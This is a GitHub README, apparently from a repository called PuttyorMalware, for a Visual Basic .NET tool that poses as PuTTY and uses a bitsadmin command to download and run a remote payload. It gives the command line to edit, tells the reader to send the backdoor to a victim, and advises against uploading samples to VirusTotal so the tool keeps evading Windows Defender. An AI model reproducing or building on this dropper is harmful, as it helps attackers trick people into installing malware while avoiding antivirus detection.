swagkarna / PuttyorMalware

Using bitsadmin to download our malware and to bypass defender

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Requirements :

1. Visual Studio 2019

2. .NetFramework v4.5+

3. Windows 10

Usage :::

1. Edit this
file.WriteLine("bitsadmin /transfer Explorers /download /priority FOREGROUND https://direct-url-for-payload/xxx.exe %temp%\payload.exe")
in visual studio and replace url with your payload url(must be direct link)

2. Now Just compile the code in visual studio you will find exe in debug/release folder

Putty in Action :::

1.Now send the backdoor to victim. when victim run putty.exe as administrator the payload will start to download from server in temp folder and will be executed ...

2. This file is not detected by windows defender(at time of creation)...After Executing Putty Malware it will take 3 minutes to execute our payload

Note :

Dont Submit sample to virustotal ...

Video Tutorial :::

IMAGE ALT TEXT

Disclaimer :::

Use it at your own risk...I am not responsible for your actions!!!!...Stay Safe!!!Stay Legal !!!....

About

Using bitsadmin to download our malware and to bypass defender


Languages

Language:Visual Basic .NET 100.0%